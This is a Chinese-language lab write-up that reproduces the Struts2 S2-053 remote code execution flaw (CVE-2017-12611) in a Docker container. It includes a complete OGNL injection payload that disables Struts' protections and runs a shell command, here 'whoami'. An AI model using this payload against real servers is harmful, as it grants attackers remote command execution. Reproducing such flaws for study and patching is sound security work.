1.漏洞描述:
漏洞名称:Struts2 Freemarker tags远程代码执行漏洞(S2-053)
漏洞CVE编号:CVE-2017-12611
漏洞影响版本:Struts 2.0.1 -Struts 2.3.33, Struts 2.5 - Struts 2.5.10
2.漏洞环境搭建:
首先拉取镜像到本地,如下:
docker pull medicean/vulapps:s_struts2_s2-053
拉取完成以后启动环境,如下:
docker run -d -p 59:8080 medicean/vulapps:s_struts2_s2-053
指定端口为59,前面为物理机端口,后面是容器端口,自己记得。
在浏览器来访问这个端口,进入demo界面。
然后我们直接来随便输入一个值,如下:
直接返回你输入的值。
然后我们输入一个表达式试试
发现被执行了。
直接构造恶意输入,exp如下:
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
该构造exp的含义在有回显的情况下表示当前用户。
至此,复现成功。
